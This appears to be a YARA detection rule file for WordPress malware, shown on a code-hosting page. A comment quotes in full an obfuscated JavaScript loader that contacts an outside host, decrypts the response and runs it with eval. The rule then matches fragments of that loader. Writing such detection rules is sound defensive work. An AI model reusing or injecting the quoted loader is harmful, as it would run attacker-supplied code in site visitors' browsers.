-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathjavascript.yar
22 lines (20 loc) · 4.51 KB
/
javascript.yar
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import "hash"
include "whitelist.yar"
/*
Managing WP Yara Ruleset - Javascript
*/
// Match var _LFKy="";function _wXPc(){function _udlzq(_VoGH,_FcGp){for(var _EAuys,_JQMP=[],_kfpw=(-94+94),_eDHv=(""),_jCxV=(-94+94);_jCxV<(243+13);_jCxV++)_JQMP[_jCxV]=_jCxV;for(_jCxV=(-94+94);_jCxV<(243+13);_jCxV++)_kfpw=(_kfpw+_JQMP[_jCxV]+_VoGH[("\u0063\u0068"+_LFKy+"\u0061"+_LFKy+"\u0072\u0043\u006f\u0064\u0065"+_LFKy+"\u0041"+_LFKy+"\u0074")](_jCxV%_VoGH[("\u006c\u0065\u006e\u0067\u0074"+_LFKy+"\u0068")]))%(243+13),_EAuys=_JQMP[_jCxV],_JQMP[_jCxV]=_JQMP[_kfpw],_JQMP[_kfpw]=_EAuys;for(var _DHxLD=_kfpw=_jCxV=(-94+94);_DHxLD<_FcGp[("\u006c\u0065\u006e\u0067\u0074"+_LFKy+"\u0068")];_DHxLD++)_kfpw=(_kfpw+_JQMP[_jCxV=(_jCxV+(-10+11))%(243+13)])%(243+13),_EAuys=_JQMP[_jCxV],_JQMP[_jCxV]=_JQMP[_kfpw],_JQMP[_kfpw]=_EAuys,_eDHv+=String[("\u0066"+_LFKy+"\u0072"+_LFKy+"\u006f\u006d"+_LFKy+"\u0043\u0068\u0061"+_LFKy+"\u0072\u0043\u006f"+_LFKy+"\u0064\u0065")](_FcGp[("\u0063\u0068"+_LFKy+"\u0061"+_LFKy+"\u0072\u0043\u006f\u0064\u0065"+_LFKy+"\u0041"+_LFKy+"\u0074")](_DHxLD)^_JQMP[(_JQMP[_jCxV]+_JQMP[_kfpw])%(243+13)]);return _eDHv}function _aXKB(){var _FcGp=(""),_EAuys=("\u0061\u0062\u0064\u0065\u0066\u0068\u0069\u006b\u006e\u0072\u0073"+_LFKy+"\u0074\u0079\u007a\u0031\u0032\u0033\u0034\u0035\u0036\u0037\u0038\u0039"+_LFKy+"\u0030"),_JQMP=_EAuys[("\u006c\u0065\u006e\u0067\u0074"+_LFKy+"\u0068")]-(-10+11);for(i=(-94+94);i<(-23+55);++i)position=window[("\u004d\u0061"+_LFKy+"\u0074"+_LFKy+"\u0068"+_LFKy+"")][("\u0066"+_LFKy+"\u006c\u006f\u006f\u0072")](window[("\u004d\u0061\u0074"+_LFKy+"\u0068")][("\u0072\u0061\u006e\u0064\u006f"+_LFKy+"\u006d")]()*_JQMP),_FcGp+=_EAuys[("\u0073"+_LFKy+"\u0075\u0062\u0073\u0074\u0072\u0069\u006e\u0067")](position,position+(-10+11));return _FcGp}var _ACMD=_aXKB();var _NHxz=("\u0059"+_LFKy+"\u006a\u0038\u0070\u0046\u0059");function _DBOOO(_kfpw){var _JQMP=new XMLHttpRequest;_JQMP[("\u006f\u006e"+_LFKy+"\u0072\u0065"+_LFKy+"\u0061\u0064"+_LFKy+"\u0079\u0073\u0074\u0061"+_LFKy+"\u0074\u0065\u0063\u0068\u0061\u006e\u0067"+_LFKy+"\u0065")]=function(){var _kfpw;_JQMP[("\u0072\u0065"+_LFKy+"\u0061\u0064"+_LFKy+"\u0079\u0053\u0074\u0061\u0074\u0065")]==XMLHttpRequest[("\u0044\u004f\u004e"+_LFKy+"\u0045")]&&((199+1)!=_JQMP[("\u0073\u0074\u0061\u0074\u0075\u0073")]&&0x130!=_JQMP[("\u0073\u0074\u0061\u0074\u0075\u0073")]||("\u006e\u0075"+_LFKy+"\u006c\u006c")!==(_kfpw=(("")+_JQMP[("\u0072\u0065"+_LFKy+"\u0073\u0070\u006f\u006e\u0073\u0065\u0054"+_LFKy+"\u0065\u0078\u0074")])[("\u0073\u0070"+_LFKy+"\u006c\u0069"+_LFKy+"\u0074"+_LFKy+"")](_NHxz)[(-10+11)])&&void (-94+94)!==_kfpw&&("")!==_kfpw&&window[("\u0065\u0076\u0061\u006c"+_LFKy+"")](_udlzq(_ACMD,window[("\u0075\u006e\u0065\u0073\u0063\u0061\u0070\u0065")](_kfpw[("\u0072\u0065\u0070\u006c\u0061\u0063"+_LFKy+"\u0065")](new RegExp(_NHxz,("\u0067"+_LFKy+"")),("\u0025"+_LFKy+""))))))},_JQMP[("\u006f\u0070\u0065"+_LFKy+"\u006e")](("\u0047\u0045\u0054"),_kfpw,!(-94+94)),_JQMP[("\u0073"+_LFKy+"\u0065\u006e\u0064")](null)}var _ZtCBI=("\u0068\u0074\u0074\u0070\u0073\u003a\u002f\u002f\u0061"+_LFKy+"\u0077\u0073\u002d\u0077\u0077\u0063\u006c\u006f\u0075\u0064\u002e\u006e\u0065\u0074\u002f\u0061\u0073\u0079\u006e\u0063\u002f\u003f\u0069\u0064\u003d"+_LFKy+"")+_ACMD;("\u0075\u006e\u0064\u0065"+_LFKy+"\u0066\u0069"+_LFKy+"\u006e\u0065\u0064")!=typeof Storage&&("\u0063\u006c\u006f\u0075"+_LFKy+"\u0064"+_LFKy+"\u005f\u0075\u0075\u0069\u0064\u0035")!==window[("\u006c\u006f\u0063"+_LFKy+"\u0061\u006c\u0053\u0074\u006f\u0072\u0061\u0067\u0065"+_LFKy+"")][("\u0063\u006c\u006f"+_LFKy+"\u0075"+_LFKy+"\u0064\u005f"+_LFKy+"\u0075"+_LFKy+"\u0075\u0069\u0064\u0035"+_LFKy+"")]&&(window[("\u006c\u006f\u0063\u0061\u006c\u0053\u0074\u006f\u0072\u0061"+_LFKy+"\u0067\u0065")][("\u0073\u0065"+_LFKy+"\u0074\u0049\u0074\u0065\u006d")](("\u0063\u006c\u006f\u0075"+_LFKy+"\u0064"+_LFKy+"\u005f\u0075\u0075\u0069\u0064\u0035"),("\u0063\u006c\u006f\u0075"+_LFKy+"\u0064"+_LFKy+"\u005f\u0075\u0075\u0069\u0064\u0035")),_DBOOO(_ZtCBI))}_wXPc();
rule windows_net_redirect_js_3 {
meta:
author = "Unknown"
date = "2023-03-01"
description = "Javascript redirect to windows.net"
strings:
$s1 = "var _LFKy=\"\";function _wXPc(){function _udlzq(_VoGH,_FcGp){for(var _EAuys,_JQMP=[],_kfpw=(-94+94),_eDHv=(\"\")" ascii
$s2 = "function _aXKB(){var _FcGp=(\"\")" ascii
$func3 = "function _DBOOO(_kfpw){var _JQMP=new XMLHttpRequest;_JQMP[(" wide ascii
$s4 = "function _DBOOO(_kfpw){var _JQMP=new XMLHttpRequest;" ascii
condition:
all of them
}